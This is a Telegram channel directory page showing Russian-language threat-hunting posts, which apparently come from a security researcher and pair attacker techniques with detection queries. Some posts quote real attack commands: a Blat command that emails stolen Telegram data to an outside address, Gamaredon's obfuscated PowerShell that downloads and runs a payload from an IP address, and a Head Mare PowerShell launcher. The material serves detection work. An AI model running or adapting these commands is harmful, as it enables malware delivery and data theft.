Мир сегодня с "Юрий Подоляка"
Мир сегодня с "Юрий Подоляка"
View
Труха⚡️Україна
Труха⚡️Україна
View
Николаевский Ванёк
Николаевский Ванёк
View
Мир сегодня с "Юрий Подоляка"
Мир сегодня с "Юрий Подоляка"
View
Труха⚡️Україна
Труха⚡️Україна
View
Николаевский Ванёк
Николаевский Ванёк
View
Know Your Adversary avatar

Know Your Adversary

https://www.knowyouradversary.ru/
TGlist rating
0
0
TypePublic
Verification
Not verified
Trust
Not trusted
Location
LanguageOther
Channel creation dateJan 01, 2025
Added to TGlist
Apr 02, 2025
I own this channel
History of changes
Linked chat
Know Your Adversary Chat
Know Your Adversary Chat
2

Records

19.04.202523:59
399Subscribers
11.01.202523:59
0Citation index
22.01.202523:59
445Average views per post
22.01.202523:59
445Average views per ad post
08.02.202523:59
7.07%ER
10.04.202517:52
27.63%ERR

Popular posts Know Your Adversary

All posts
Post media background
Post media
08.04.202515:22
Всем привет!

Сегодня я решил поделиться информацией об одном интересном инструменте для эксфильтрации данных, который используется группировкой Rare Werewolf. Он называется Blat.

Этот инструмент используется этой группировкой уже довольно давно. Вот пример:

blat.exe -to in@vniir.nl -f "TELEGRAM


Как видите, злоумышленник использует этот инструмент для эксфильтрации собранных данных мессенджера Telegram. То есть да, Blat — это просто небольшая легитимная утилита, которая позволяет злоумышленникам отправлять собранные данные по электронной почте!

Мы можем отслеживать такую активность, сосредоточив внимание на учетных данных и вложениях:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "blat.exe"

AND

cmdline: ("u" AND "pw" AND "attach")


Кстати, у этого образца есть и другие интересные поведенческие особенности — взгляните!

Увидимся завтра!
Post media background
Post media
25.03.202515:37
Всем привет!

Я составил список инструментов, которые используются вымогателями для обхода средств защиты, и планирую рассмотреть каждый из них в блоге. Сегодня поговорим о PCHunter.

Этот инструмент используется злоумышленниками для выявления процессов, связанных с продуктами безопасности, и их завершения.

Как всегда, начнем с обнаружения исполняемого файла:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "PCHunter.exe"


Также можно искать связанные DNS-запросы:

event_type: "dnsreq"

AND

dns_rname: "epoolsoft.com"


Наконец, полезно отслеживать события создания файлов драйверов PCHunter:

event_type: "filecreatewin"

AND

file_path: ("PCHunter" AND "sys")


Как всегда, вот образец.

Увидимся завтра!
31.03.202504:54
Всем привет!

Мы уже давно не обсуждали злоупотребление PowerShell, но, думаю, пора продолжить. И нам в этом поможет Gamaredon!

Группа продолжает распространять вредоносные LNK-файлы, содержащие PowerShell-код для загрузки и выполнения полезной нагрузки, а также открытия отвлекающего документа. Например:

powershell.exe -WindowStyle hidden echo DsuXBGtDPVpafNQKWfGNQXRPehfejEMnZWqvtPFEKrDQRtLDoRtJCcMjEFenVKrryMHia; Write-HostZVRjgZrFwKSbjNrBtIujdNLLlPq; if (-not(Test-Path iscabv.''zi''p -PathType Leaf)){echo vgUYzpRfaoGxgCSuzlmZCRxmXRnGJKBwooBEEoJgvYqjRXoXTHaspGDtNMuMovanuZezIbSYgAmXMqDOLMczhxmvJtkBJPsVai; &(g''cm i******w*****r) -uri h''t''tp:''//''146''.''1''85''.''233''.''90''/iscabv.''zi''p -OutFile iscabv.''zi''p}; Expand-Archive -Path iscabv.''zi''p -DestinationPath Drvx64; star''t  Drvx64/IsCabView.''e''xe; echo ihdfDvzZhaId; &(g''c''m *******ke-****est) -uri h''t''tp:''//''146''.''1''85''.''233''.''90''/oudid/Nak0579.doc -OutFile Nak0579.doc; sta''rt Nak0579.doc


Как видите, здесь есть несколько интересных параметров командной строки, которые можно использовать для детектирования и поиска угроз.

Я выбрал следующие параметры для обнаружения: "WindowStyle hidden echo" и "Expand-Archive":

event_type: "processcreatewin"

AND

proc_file_name: "powershell.exe"

AND

cmdline: ("WindowStyle hidden echo" AND "Expand-Archive")


Более того, аналогичный метод можно использовать для поиска похожих файлов, например, на VirusTotal.

Удачной охоты и увидимся завтра!
Post media background
Post media
02.04.202513:53
Всем привет!

Давайте еще раз поговорим о технике Dead Drop Resolver (DDR). Команда Cyble представила отчет о FogDoor. Этот бэкдор получает команды из профиля в социальной сети, взаимодействуя с bark[.]lgbt/api.

Это значит, что мы можем отслеживать коммуникации с этим доменом:

event_type: "dnsreq"

AND

dns_rname: "bark.lgbt"


Но это еще не все! Злоумышленник также использовал временное хранилище вебхуков, webhookbin[.]net, для сбора вывода выполненных команд. Мы можем искать аналогичную активность, используя ту же логику:

event_type: "dnsreq"

AND

dns_rname: "webhookbin.net"


Как всегда, больше возможностей для обнаружения можно найти в отчете.

Увидимся завтра!

English version
24.03.202518:18
Всем привет!

Давайте поговорим еще об одном инструменте в арсенале вымогателей. На этот раз это будет HRSword! Злоумышленники обычно используют его для отключения защитных механизмов на целевой машине.

Например, согласно этому отчету, инструмент использовался Helldown ransomware для мониторинга и завершения процессов, связанных с безопасностью.

Начнем с самого бинарного файла и сфокусируемся на его метаданных:

event_type: "processcreatewin"  

AND  

proc_file_originalfilename: "HRSword.exe"


Этот инструмент также злоупотребляет cmd.exe для копирования нескольких файлов в C:\Windows\System32\drivers\, например:

cmd.exe /S /D /c" copy Drivers\x32\sysdiag.sys "C:\Windows\System32\drivers\"


Мы можем использовать следующую логику для обнаружения:

event_type: "processcreatewin"  

AND  

proc_file_name: "cmd.exe"  

AND  

cmdline: ("copy" AND "drivers")


Хотите больше возможностей для обнаружения? Изучите образец!

Увидимся завтра!
Post media background
Post media
29.03.202515:46
Всем привет!

Злоумышленники всегда нуждаются в выполнении команд через различные интерпретаторы команд и сценариев. Это хорошо известное поведение, поэтому они постоянно ищут техники обхода защитных механизмов.

Trend Micro выпустила отчет о Water Gamayun и отметила интересную технику, используемую злоумышленниками для прокси-выполнения. Атакующие злоупотребляли переименованной версией IntelliJ Command Line Runner (runnerw.exe) для выполнения PowerShell.

Разумеется, мы можем выявить похожее поведение, отлавливая запуски переименованных исполняемых файлов:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "runnerw.exe"

AND NOT

proc_file_name: ("runnerw.exe" OR "runnerw64.exe")


Как всегда, в отчете можно найти еще больше возможностей для обнаружения!

Увидимся завтра!

English version
Post media background
Post media
06.04.202508:51
Всем привет!

Давайте снова поговорим о Mustang Panda (мы отслеживаем этот кластер под именем Horned Werewolf, если помните).

Этот противник обожает использовать DLL Side-Loading и постоянно находит новые уязвимые исполняемые файлы. Например, в этот раз кластер использовал Canon IJ Printer Assistant Tool.

Можно ли мы отследить такую активность? Конечно!

Начнём с запуска Canon IJ Printer Assistant Tool (cnmpaui.exe) из нетипичных директорий:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "cnmpaui.exe"

AND NOT

proc_file_path: "Canon\\Canon IJ Printer Assistant Tool"


Ещё один показательный признак — запуск winword.exe из cnmpaui.exe для показа отвлекающего документа:

event_type: "processcreatewin"

AND

proc_p_file_path: "cnmpaui.exe"

AND

proc_file_path: "winword.exe"


Как всегда, вы можете найти ещё больше возможностей для обнаружения, если захотите!

Удачной охоты и увидимся завтра!

English version
Post media background
Post media
26.03.202519:05
Всем привет!

Давайте поговорим о файлах SVG. В последнее время многие злоумышленники используют их в своих фишинговых кампаниях.

Более того, во многих случаях атакующие используют файлы с двойным расширением, например: New Purchase Order__pdf.svg. Эти файлы содержат обфусцированный JavaScript-код, который собирает учетные данные и передает их на сервер, контролируемый атакующим.

Двойное расширение делает такие файлы довольно простыми для обнаружения:

event_type: "filecreatewin"

AND

file_name: ("pdf" AND "svg")


Конечно, злоумышленники могут использовать просто расширение .svg, поэтому можно отслеживать события создания файлов SVG в папках, часто используемых для загрузки файлов, таких как Downloads, Desktop, Documents и другие.

Увидимся завтра!
Post media background
Post media
28.03.202514:25
Привет всем!

Новый день — новый инструмент. На этот раз это не обычный инструмент, а PowerTool! Это еще один популярный инструмент, который используют группировки-вымогатели для отключения средств защиты. Например, его применяют партнеры Akira.

Давайте начнем с событий создания процессов:

event_type: "processcreatewin"

AND

(proc_file_productname: "PowerTool"

OR

proc_file_originalfilename: "PowerTool.exe")


Еще один момент — загрузка драйвера PowerTool:

event_type: "processmoduleload"

AND

file_productname: "PowerTool"


Хотите больше? Вот вам образец!

Увидимся завтра!
Post media background
Post media
09.04.202518:49
Всем привет!

Думаю, вы уже слышали об уязвимости нулевого дня в Common Log File System (CLFS), которая эксплуатировалась RansomEXX. Речь идет о CVE-2025-29824.

Если заглянуть в отчет Microsoft Threat Intelligence Center (MSTIC), можно заметить любопытный артефакт. В рамках эксплуатации создается CLFS BLF-файл: C:\ProgramData\SkyPDF\PDUDrv.blf.

Что это значит? Мы можем использовать это поведение для проактивного поиска подобной активности! Например:

event_type: "filecreatewin"

AND

file_path: ("programdata" AND "blf")


Несмотря на то, что злоумышленник использовал уязвимость нулевого дня для повышения привилегий, в цепочке атаки были и легко обнаруживаемые действия — например, злоупотребление ProcDump для дампа LSASS.

Как всегда — даже в сложных случаях у нас есть масса возможностей для детектирования!

Увидимся завтра!

English version
Post media background
Post media
27.03.202515:48
Всем привет!

Давайте продолжим разбирать инструменты, которые используют вымогатели. На этот раз это IObit Unlocker. Злоумышленники применяют этот инструмент для разблокировки файлов и папок, которые заняты другими процессами. Например, этот инструмент входит в арсенал RansomHub.

Как всегда, мы можем анализировать метаданные или, если злоумышленник установил инструмент, искать соответствующие папки:

event_type: "processcreatewin"  

AND  

(proc_file_productname: "IObit Unlocker"  

OR  

proc_file_path: "IObit")


Вы также можете изучить образец самостоятельно и найти дополнительные возможности для обнаружения!

Увидимся завтра!

English version
23.03.202510:18
Всем привет!

Вредоносные расширения для браузеров перестают быть чем-то экзотическим. Например, Rilide. Впервые о нем сообщили в апреле 2023 года, но с тех пор он стал распространенной угрозой, и этот отчет — еще одно тому доказательство.

Можем ли мы проактивно искать такие расширения? Конечно, да! Например, подобные угрозы, как правило, модифицируют LNK-файлы браузеров, добавляя аргумент --load-extension, например:

chrome.exe --load-extension="C:\Users\user\AppData\Local\Temp\MalExt"

Это значит, что мы можем искать выполнение популярных браузеров на основе Chromium с этим аргументом:

event_type: "processcreatewin"

AND

proc_file_name: ("chrome.exe" OR "brave.exe" OR "opera.exe" OR "msedge.exe")

AND

cmdline: "load-extension"


Конечно, вы получите ложные срабатывания, но разве не этого мы ждем от проактивного поиска угроз (Threat Hunting)? Уверен, правильная фильтрация вам поможет!

Увидимся завтра!
Post media background
Post media
01.04.202508:36
Всем привет!

Сегодня мы рассмотрим еще один любопытный пример злоупотребления PowerShell — на этот раз от Head Mare (мы отслеживаем эту активность как Rainbow Hyena).

Злоумышленник распространял защищенные паролем архивы с вредоносными LNK-файлами. LNK-файл выполняет следующую команду PowerShell для запуска бэкдора PhantomPyramid на скомпрометированной системе:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "$r=$(Get-Location).Path + '\\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.zip';if(Test-Path $r) { cmd.exe /c start /B $r; } else { $f=$(Get-ChildItem -Path 'C:\Users\


Думаю, вы уже заметили интересные строки, которые можно использовать для обнаружения: "WriteAllBytes", "Combine", "ReadAllBytes". Давайте сформируем логику для детектирования:

event_type: "processcreatewin"

AND

proc_file_name: "powershell.exe"

AND

cmdline: ("WriteAllBytes" AND "Combine" AND "ReadAllBytes")


Если вы хотите узнать больше об этой кампании, вот отчет команды Kaspersky.

Увидимся завтра!

English version
Reposted from:
BI.ZONE avatar
BI.ZONE
Post media background
Post media
07.04.202512:41
🌛 Как угрозоцентричный подход позволяет избежать ущерба от кибератак

В новой статье рассказали о подходе к кибербезопасности, который позволит сосредоточиться на самых актуальных угрозах.

Из нее вы узнаете:

🟦что это за подход,
🟦в чем его преимущества,
🟦как предотвращать реальные атаки, используя киберразведданные.

Читать статью

А чтобы закрепить материал, подключайтесь к бесплатному вебинару. На нем обсудим, как получить максимум от данных киберразведки и какие инструменты BI.ZONE Threat Intelligence помогут в проактивном поиске угроз для вашей организации.

➡️Зарегистрироваться
Post media background
Post media
18.04.202508:54
Всем привет!

Сегодня мы поговорим о ещё одном интересном сервисе, который злоумышленники используют для связи с серверами управления и контроля (C&C).

Согласно этому отчёту команды Kaspersky, IronHusky использовал легитимный сервер https://ppng[.]io, основанный на проекте piping-server, для запроса команд и отправки результатов их выполнения.

Что это означает? Мы можем отслеживать обращения к этому домену с помощью следующего запроса:

event_type: "dnsreq"

AND

dns_rname: "ppng.io"


Злоумышленник использовал упомянутую выше вредоносную программу для загрузки MysterySnail RAT.

Увидимся завтра!
Log in to unlock more functionality.